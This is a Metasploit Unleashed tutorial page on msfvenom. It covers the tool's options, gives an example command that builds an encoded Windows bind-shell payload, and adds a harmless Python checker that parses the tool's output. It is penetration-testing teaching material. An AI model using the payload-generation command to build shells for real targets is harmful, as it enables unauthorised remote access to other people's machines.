Msfvenom

From Metasploit Unleashed - Mastering The Framework


msfvenom is a combination of msfpayload and msfencode, putting both of these tools into a single framework instance. The advantages of msfvenom are:

  • One single tool
  • Standardized command line options
  • Increased speed

At this point msfvenom is still in its infancy, but it already has many options:

root@bt:~# /pentest/exploits/framework3/msfvenom -h
Usage: /pentest/exploits/framework3/msfvenom [options] 

Options:
    -p, --payload    [payload]       Payload to use. Specify a '-' or stdin to use custom payloads
    -l, --list       [module_type]   List a module type example: payloads, encoders, nops, all
    -n, --nopsled    [length]        Prepend a nopsled of [length] size on to the payload
    -f, --format     [format]        Format to output results in: raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war
    -e, --encoder    [encoder]       The encoder to use
    -a, --arch       [architecture]  The architecture to use
        --platform   [platform]
                                     The platform of the payload
    -s, --space      [length]        The maximum size of the resulting payload
    -b, --bad-chars  [list]          The list of characters to avoid example: '\x00\xff'
    -i, --iterations [count]         The number of times to encode the payload
    -x, --template   [path]          Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -h, --help                       Show this message

An example of the usage of msfvenom can be seen below:

root@bt:~# /pentest/exploits/framework3/msfvenom -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3
[*] x86/shikata_ga_nai succeeded with size 325 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 352 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 379 (iteration=3)

The command above generates a Windows bind shell, encoded with three iterations of the shikata_ga_nai encoder and with null bytes (-b '\x00') excluded from the resulting shellcode.
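As an added check (example code, not from the Metasploit Unleashed page or from the Metasploit project), the Python below parses msfvenom's ruby-format output: it decodes the buf string back to raw bytes, confirms the byte count matches the size reported for the last encoder iteration, and verifies that none of the bytes listed in the -b argument survive. The sample output and the bad-character list are constructed for the example.

```python
import re

# Constructed sample of msfvenom ruby-format output (not the page's own blob).
SAMPLE_OUTPUT = r'''
[*] x86/shikata_ga_nai succeeded with size 4 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 5 (iteration=2)
buf = 
"\xdb\xdb\xbe\x0a" +
"\x3a"
'''

BAD_CHARS_ARG = r'\x00\xff'   # constructed value, in the same form one passes to -b


def unescape_hex(text: str) -> bytes:
    """Turn a run of \\xNN escapes (as printed by msfvenom) into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r'\\x([0-9a-fA-F]{2})', text))


def parse_iterations(output: str) -> list:
    """Return (iteration, size) pairs from the '[*] ... succeeded' status lines."""
    pairs = re.findall(r'succeeded with size (\d+) \(iteration=(\d+)\)', output)
    return [(int(it), int(size)) for size, it in pairs]


def parse_ruby_buf(output: str) -> bytes:
    """Decode the ruby-format buf = "\\x.." + "\\x.." block into raw bytes."""
    body = output.split('buf =', 1)[1]
    # Each quoted piece is a sequence of \xNN escapes joined with '+'.
    pieces = re.findall(r'"((?:\\x[0-9a-fA-F]{2})*)"', body)
    return b''.join(unescape_hex(p) for p in pieces)


def check_payload(output: str, bad_chars_arg: str) -> dict:
    """Compare the decoded bytes against the reported size and the -b list."""
    buf = parse_ruby_buf(output)
    iterations = parse_iterations(output)
    bad = set(unescape_hex(bad_chars_arg))
    final_size = iterations[-1][1] if iterations else None
    return {
        'bytes': len(buf),
        'final_reported_size': final_size,
        'size_matches': final_size == len(buf),
        'bad_chars_found': sorted({b for b in buf if b in bad}),
        'iterations': iterations,
    }


if __name__ == '__main__':
    print(check_payload(SAMPLE_OUTPUT, BAD_CHARS_ARG))
```

Run against real msfvenom output by pasting the full terminal text (status lines plus the buf block) into SAMPLE_OUTPUT and passing the same -b string that was used on the command line.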
